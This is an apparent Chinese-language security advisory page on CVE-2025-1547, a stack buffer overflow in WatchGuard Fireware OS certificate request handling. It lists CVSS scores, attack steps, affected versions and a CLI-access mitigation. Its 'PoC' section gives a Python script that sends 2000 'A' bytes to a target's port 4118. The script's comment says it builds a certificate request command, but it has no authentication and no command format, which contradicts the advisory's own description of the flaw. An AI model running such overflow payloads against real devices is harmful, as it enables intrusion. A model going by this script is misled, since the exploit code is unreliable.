CVE-2025-1547 CVSS 7.2 高危

CVE-2025-1547: WatchGuard Fireware OS栈缓冲区溢出漏洞

披露日期: 2025-12-04

来源: 5d1c2695-1a31-4499-88ae-e847036fd7e3

漏洞信息

漏洞编号

CVE-2025-1547

漏洞类型

栈缓冲区溢出

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WatchGuard Fireware OS

漏洞概述

这是WatchGuard Fireware OS中一个基于栈的缓冲区溢出漏洞（CWE-121）。该漏洞存在于证书请求命令处理中，可能允许经过认证的高权限用户通过精心构造的CLI命令触发溢出，从而执行任意代码。此漏洞影响多个版本的Fireware OS，需要尽快修复。

技术细节

漏洞源于证书请求命令处理中的边界检查缺陷，攻击者可通过超长输入或特殊构造的数据包覆盖栈内存，劫持程序执行流程。

攻击链分析

STEP 1

步骤1

攻击者获取WatchGuard Fireware OS的高权限账户

STEP 2

步骤2

通过CLI接口发送精心构造的证书请求命令

STEP 3

步骤3

触发栈缓冲区溢出，覆盖返回地址

STEP 4

步骤4

执行任意代码或获取系统控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

python
import socket

target = '目标IP'
port = 4118

# 构造恶意证书请求命令
payload = b'A' * 2000

# 发送payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
s.close()

影响范围

WatchGuard Fireware OS 12.0 - 12.5.12+701324

WatchGuard Fireware OS 12.6 - 12.11.2

防御指南

临时缓解措施

在应用官方补丁前，限制对CLI接口的访问，确保只有受信任的管理员才能访问系统。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表